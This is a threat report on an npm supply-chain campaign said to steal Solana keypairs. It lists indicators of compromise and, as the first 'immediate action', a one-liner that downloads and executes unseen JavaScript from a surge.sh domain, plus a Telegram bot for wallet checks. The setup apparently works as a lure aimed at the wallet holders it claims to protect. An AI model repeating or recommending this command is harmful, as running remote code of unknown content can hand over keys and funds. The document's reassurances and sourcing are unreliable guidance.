GlassWorm Technical IOC Report: Hunt This Malware in Your npm Project

GlassWorm is a supply chain malware campaign active since March 2026 that has compromised 400+ repositories and infected npm packages with 134,887 combined monthly downloads. This report covers detection indicators, attack chain, and free scanning tools.

Attack Chain Summary

1. Attacker publishes malicious npm package (or compromises existing one via maintainer account takeover)

2. Package contains backdoored code hidden using invisible Unicode control characters (U+200B zero-width space, U+FEFF BOM, U+200C zero-width non-joiner)

3. On install, postinstall script scans the machine for Solana keypair files (~/.config/solana/id.json and similar paths)

4. Keypair data is base64-encoded and exfiltrated via a Solana memo program transaction — using the blockchain itself as a C2 channel

5. The attacker's monitoring script watches for incoming memo transactions and decodes the stolen keypairs

Why Traditional Detection Fails

• Antivirus: The malicious code uses invisible Unicode so it looks like normal source to static scanners

• Network monitoring: Exfiltration goes via Solana RPC endpoints (standard blockchain traffic)

• DNS/IP blocking: Uses public Solana RPC nodes — blocking them breaks all Solana development

• Code review: Invisible Unicode characters don't render in most editors without special settings

Indicators of Compromise (IOCs)

File-level indicators:

• Presence of Unicode chars U+200B, U+FEFF, U+200C in .js/.ts files (especially in string literals or identifiers)

• postinstall scripts in package.json that reference fs, os.homedir(), or process.env.HOME

• Dynamic require() or eval() calls in build scripts

• Outbound network calls in lifecycle scripts (preinstall, install, postinstall, prepare)

Blockchain-level indicators:

• Memo program transactions from a Solana address that the owner didn't initiate

• Base64-encoded memo data matching patterns: [A-Za-z0-9+/]{40,}={0,2}

• Memo transactions sent at odd hours or in clusters (bulk exfiltration pattern)

• Multiple small-SOL transactions to unknown addresses (possible key-verification pings)

Detection: Free Local Scanner

Run this one-liner on any machine where you've installed npm packages since March 2026:

node -e "$(curl -s https://solguard-security-monitor.surge.sh/scan.js)"

What it checks:

• package.json and package-lock.json for suspicious postinstall scripts

• node_modules for invisible Unicode characters in JS files

• VS Code extension directory for compromised extensions

• Local Solana keypair files and their last-modified timestamps

Nothing leaves your machine. Open source. No install required.

Detection: Blockchain C2 Scanner

To check if a Solana address has been used as a GlassWorm C2 channel or if your wallet has suspicious memo transactions:

1. Open Telegram and search for @SolGuard_Bot

2. Send: /glassworm <your-solana-address>

3. The scanner checks: memo transaction patterns, timing anomalies, known malicious addresses, encoded data signatures

Free to use. No account required.

Timeline

• March 1-15, 2026: Initial npm package compromises. React Native ecosystem packages affected.

• March 16-31, 2026: Campaign expands to PyPI and VS Code extensions. 400+ repos compromised.

• April 2026: Still active. Not all infected packages have been removed from npm registry.

Immediate Actions

1. Run the local scanner (one-liner above)

2. If you hold Solana, move funds to a fresh keypair generated on an air-gapped machine

3. Audit package.json dependencies added since March 1, 2026

4. Check npm audit for known vulnerable versions

5. Enable Solana wallet monitoring: @SolGuard_Bot /watch <address>

Sources: BleepingComputer, The Hacker News, Dark Reading (March-April 2026 coverage)